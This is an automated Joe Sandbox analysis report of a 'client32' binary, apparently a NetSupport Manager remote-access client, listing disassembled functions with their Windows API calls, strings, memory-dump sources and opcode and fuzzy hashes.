Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6

Function 11001D50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,?,?,?,?,?,?), ref: 11001D8F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001D66
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001D61

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2577986331-2830328467
Opcode ID: 10fb171e59e47ef79b130c3466e465729b4b829317f02908d57d2e59822eb12b
Instruction ID: 322edc2addb406ddeff7b8df0f89bf4f53b761dd578eb9ad3962261d6536b3d8
Opcode Fuzzy Hash: 10fb171e59e47ef79b130c3466e465729b4b829317f02908d57d2e59822eb12b
Instruction Fuzzy Hash: 5EF030B6600219BFC744DE89DC81EDBB3ACEB48754F00802AF91993240D670E8508BA4

Function 1115B8C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindowTextLengthA.USER32(75BF1A30), ref: 1115B8C3

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

GetWindowTextA.USER32(75BF1A30,00000000,00000001), ref: 1115B8DD

Strings

..., xrefs: 1115B8EB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: TextWindow$Length_malloc_memset
String ID: ...
API String ID: 2795061067-1685331755
Opcode ID: 5dc963570315ec402771aca9ff6a3b73e811b291b198767a3b3519a1bad44f9e
Instruction ID: 4b1d5b0fb85ecc65756fa04cbc49f4114121db69e5f1a8b46b9f358c176aa325
Opcode Fuzzy Hash: 5dc963570315ec402771aca9ff6a3b73e811b291b198767a3b3519a1bad44f9e
Instruction Fuzzy Hash: A5E0E565A041965FC2404639AA4898BFF59FB86208B044430F0B6D7105DA24E40987E0

Function 110B7A30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583

timeBeginPeriod.WINMM(00000001), ref: 110B7A4B

Part of subcall function 111100D0: SetEvent.KERNEL32(00000000), ref: 111100F4

Part of subcall function 110B78A0: WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B790D

Part of subcall function 11110100: SetEvent.KERNEL32(?,?,1105AC81,?,0000000F), ref: 1111010B
Part of subcall function 11110100: PulseEvent.KERNEL32(00000244,?,1105AC81,?,0000000F), ref: 1111011E

timeEndPeriod.WINMM(00000001), ref: 110B7A73

Strings

NewScrape, xrefs: 110B7A35

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Periodtime$BeginHookObjectPulseSingleUnhookWaitWindows
String ID: NewScrape
API String ID: 763200252-2412895908
Opcode ID: 0caaa3997b03a19c8032679a032b84cb6462b983fff3b4a85ec7ae3d38999275
Instruction ID: 0532575c9b5ed6340c15d9b2bbe564911d28b41324b31d0e36e59a28696be9e8
Opcode Fuzzy Hash: 0caaa3997b03a19c8032679a032b84cb6462b983fff3b4a85ec7ae3d38999275
Instruction Fuzzy Hash: 5BE0D83DF8011A27C609A3B26805B8FBA458FD476DF040031FA1A5BAC0ED95780082F9

Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
SetLastError.KERNEL32(00000078), ref: 1101D351

Strings

FlashWindowEx, xrefs: 1101D32E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: FlashWindowEx
API String ID: 199729137-2859592226
Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90

Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110010A6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitItemLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2046328329-2830328467
Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5

Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 11001083

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001066
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 819365019-2830328467
Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0

Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(?,?,?,?), ref: 11001113

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110010F6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastPostProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 906220102-2830328467
Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0

Function 11015A50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 11015A7B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11015A66
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11015A61

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: 40329414c89a52ed32cb3ebcd20211a094653e34b52d37923b7305b080e852dc
Instruction ID: d339dbb22eae9c0b9dab6477d3c38b96bead437c263ff92bb91f5700725545cb
Opcode Fuzzy Hash: 40329414c89a52ed32cb3ebcd20211a094653e34b52d37923b7305b080e852dc
Instruction Fuzzy Hash: 98E026B97003286BC314DF95DC81E9AF3D8EB48314F00802BF9255B300C671E840C7D0

Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001014,?,?), ref: 110151D4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110151B6
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0

Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11017206
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694

Function 11001BD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,?,?), ref: 11001BFF

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001BE6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001BE1

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2776021309-2830328467
Opcode ID: 755a9776fea6f005391afbd423a88cadd0b6998a93535cd2b22780f3c32d3b99
Instruction ID: f329f54fccfbd903c35ddfc7245e55534a92ffb2c11cbd1515618277d015e5d1
Opcode Fuzzy Hash: 755a9776fea6f005391afbd423a88cadd0b6998a93535cd2b22780f3c32d3b99
Instruction Fuzzy Hash: 6BE0C2B5A00329BBD300DA81DC82EE7F3ACFB482A4F00C03AFC2556200E7B0E940C7A0

Function 11001D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetWindowTextA.USER32(?,?,?), ref: 11001D3F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11001D26
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001D21

Memory Dump Source

